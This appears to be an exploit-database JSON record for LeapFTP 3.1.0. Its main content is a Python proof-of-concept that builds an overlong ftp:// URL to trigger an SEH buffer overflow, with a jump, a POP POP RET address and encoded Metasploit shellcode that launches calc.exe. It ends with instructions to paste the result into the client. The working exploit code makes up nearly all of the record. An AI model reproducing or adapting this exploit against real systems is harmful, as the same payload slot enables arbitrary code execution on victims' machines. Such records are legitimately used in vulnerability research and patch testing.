Description
# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
# Google Dork: "k3170makan is totally awesome" hehehe
# Date: 2014-08-28
# Exploit Author: k3170makan
# Vendor Homepage: http://www.leapware.com/
# Software Link: http://www.leapware.com/download.html
# Version: 3.1.0
# Tested on: Windows XP SP0 (on Windows SP2 and Windows 7 the result is only a crash, i.e. DoS)
{"lastseen": "2020-04-01T19:04:25", "references": [], "description": "\n# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit\n# Google Dork: \"k3170makan is totally awesome\" hehehe\n# Date: 2014-08-28\n# Exploit Author: k3170makan\n# Vendor Homepage: http://www.leapware.com/\n# Software Link: http://www.leapware.com/download.html\n# Version: 3.1.0\n# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)", "edition": 1, "reporter": "k3170makan", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2015-01-04T16:17:41", "title": "LeapFTP-3.1.0-URL-Handling", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-04T16:17:41", "id": "EXPLOITPACK:4C841902BBB70EBE5758529014DE33F2", "href": "", "viewCount": 1, "sourceData": "from sys import argv\nif __name__ == \"__main__\":\novTrigger = 1093\nf = open(\"exploit.txt\",\"w\")\nf.write(\"ftp://\")\nf.write(\"A\"*ovTrigger)\nf.write(\"\\xEB\\x06\\x90\\x90\") #JMP to payload\nf.write(\"\\x44\\xD3\\x4A\\x77\") #POP POP RET\nf.write(\"\\x90\"*30)\n#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1\n-b \\x00\\x0a\\x0d\\xff\nshellcode = \"\\x89\\xe0\\xd9\\xe8\\xd9\\x70\\xf4\\x5f\\x57\\x59\\x49\\x49\\x49\\x49\" +\\\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" +\\\n\"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" +\\\n\"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" +\\\n\"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x68\\x68\\x4f\\x79\\x35\\x50\\x53\\x30\" +\\\n\"\\x45\\x50\\x35\\x30\\x6e\\x69\\x79\\x75\\x30\\x31\\x6a\\x72\\x30\\x64\" +\\\n\"\\x4c\\x4b\\x53\\x62\\x56\\x50\\x4e\\x6b\\x76\\x32\\x56\\x6c\\x6c\\x4b\" +\\\n\"\\x42\\x72\\x62\\x34\\x6e\\x6b\\x54\\x32\\x46\\x48\\x76\\x6f\\x6e\\x57\" 
+\\\n\"\\x61\\x5a\\x67\\x56\\x45\\x61\\x39\\x6f\\x64\\x71\\x4b\\x70\\x4e\\x4c\" +\\\n\"\\x55\\x6c\\x53\\x51\\x33\\x4c\\x67\\x72\\x76\\x4c\\x51\\x30\\x59\\x51\" +\\\n\"\\x38\\x4f\\x64\\x4d\\x45\\x51\\x49\\x57\\x4d\\x32\\x58\\x70\\x56\\x32\" +\\\n\"\\x70\\x57\\x4e\\x6b\\x31\\x42\\x76\\x70\\x4e\\x6b\\x61\\x52\\x47\\x4c\" +\\\n\"\\x73\\x31\\x5a\\x70\\x4c\\x4b\\x57\\x30\\x53\\x48\\x6c\\x45\\x4f\\x30\" +\\\n\"\\x33\\x44\\x51\\x5a\\x65\\x51\\x48\\x50\\x42\\x70\\x6e\\x6b\\x72\\x68\" +\\\n\"\\x67\\x68\\x6c\\x4b\\x30\\x58\\x47\\x50\\x77\\x71\\x5a\\x73\\x49\\x73\" +\\\n\"\\x77\\x4c\\x71\\x59\\x6e\\x6b\\x35\\x64\\x4e\\x6b\\x57\\x71\\x4b\\x66\" +\\\n\"\\x35\\x61\\x4b\\x4f\\x34\\x71\\x4f\\x30\\x4e\\x4c\\x59\\x51\\x4a\\x6f\" +\\\n\"\\x74\\x4d\\x75\\x51\\x58\\x47\\x44\\x78\\x59\\x70\\x62\\x55\\x68\\x74\" +\\\n\"\\x33\\x33\\x61\\x6d\\x4b\\x48\\x65\\x6b\\x33\\x4d\\x47\\x54\\x72\\x55\" +\\\n\"\\x58\\x62\\x36\\x38\\x6e\\x6b\\x32\\x78\\x35\\x74\\x55\\x51\\x4a\\x73\" +\\\n\"\\x73\\x56\\x4e\\x6b\\x66\\x6c\\x72\\x6b\\x6e\\x6b\\x71\\x48\\x77\\x6c\" +\\\n\"\\x47\\x71\\x78\\x53\\x6e\\x6b\\x73\\x34\\x4e\\x6b\\x75\\x51\\x5a\\x70\" +\\\n\"\\x4b\\x39\\x77\\x34\\x35\\x74\\x71\\x34\\x31\\x4b\\x51\\x4b\\x75\\x31\" +\\\n\"\\x71\\x49\\x70\\x5a\\x66\\x31\\x4b\\x4f\\x39\\x70\\x43\\x68\\x43\\x6f\" +\\\n\"\\x53\\x6a\\x4c\\x4b\\x42\\x32\\x38\\x6b\\x4b\\x36\\x53\\x6d\\x42\\x4a\" +\\\n\"\\x36\\x61\\x4c\\x4d\\x4b\\x35\\x68\\x39\\x65\\x50\\x35\\x50\\x55\\x50\" +\\\n\"\\x70\\x50\\x52\\x48\\x76\\x51\\x6c\\x4b\\x62\\x4f\\x6c\\x47\\x79\\x6f\" +\\\n\"\\x6e\\x35\\x6f\\x4b\\x4a\\x50\\x4e\\x55\\x69\\x32\\x32\\x76\\x55\\x38\" +\\\n\"\\x79\\x36\\x6c\\x55\\x6f\\x4d\\x4d\\x4d\\x6b\\x4f\\x78\\x55\\x75\\x6c\" +\\\n\"\\x73\\x36\\x31\\x6c\\x57\\x7a\\x4b\\x30\\x79\\x6b\\x49\\x70\\x70\\x75\" +\\\n\"\\x64\\x45\\x4f\\x4b\\x63\\x77\\x37\\x63\\x62\\x52\\x52\\x4f\\x52\\x4a\" +\\\n\"\\x77\\x70\\x56\\x33\\x69\\x6f\\x4e\\x35\\x30\\x63\\x35\\x31\\x50\\x6c\" 
+\\\n\"\\x51\\x73\\x36\\x4e\\x45\\x35\\x44\\x38\\x33\\x55\\x53\\x30\\x41\\x41\"\nf.write(shellcode)\nf.flush()\nf.close()\n#copy contents of exploit.txt to your clipboard and then launch LeapFTP\n <http://about.me/k3170makan>\nKeith Makan <http://about.me/k3170makan>\nabout.me/k3170makan\n <http://about.me/k3170makan>\n", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645477240}}
{}